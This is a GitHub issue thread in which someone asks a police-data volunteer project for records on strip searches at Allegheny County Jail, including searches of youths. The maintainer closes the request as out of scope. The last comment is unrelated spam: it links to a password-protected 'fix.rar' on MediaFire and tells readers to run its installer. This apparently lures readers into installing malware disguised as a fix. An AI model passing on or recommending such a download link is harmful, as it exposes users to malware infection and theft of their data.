### ISSUE TITLE
Allegheny County Jail strip searches

### ISSUE THREAD

**Issue by josh-chamberlain** [Police-Data-Accessibility-Project/data-projects#84]
Someone has requested help on a data project:

## Submission notes
How many children in the jail were strip-searched, and what precautions are used in the unimaginable circumstance when a youth is strip-searched? How are the sessions recorded? Who is present when a search is conducted?

Broken out for adult men, adult women, non-gender conforming adults
How often are people strip searched and why?

## Location
Allegheny County Jail

## How to help
Leave a comment if you'd like to help. Do you have ideas, questions, or need any more information to get started?

**Comment by josh-chamberlain** [comment]
These records do not seem to exist, and are out of scope.

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
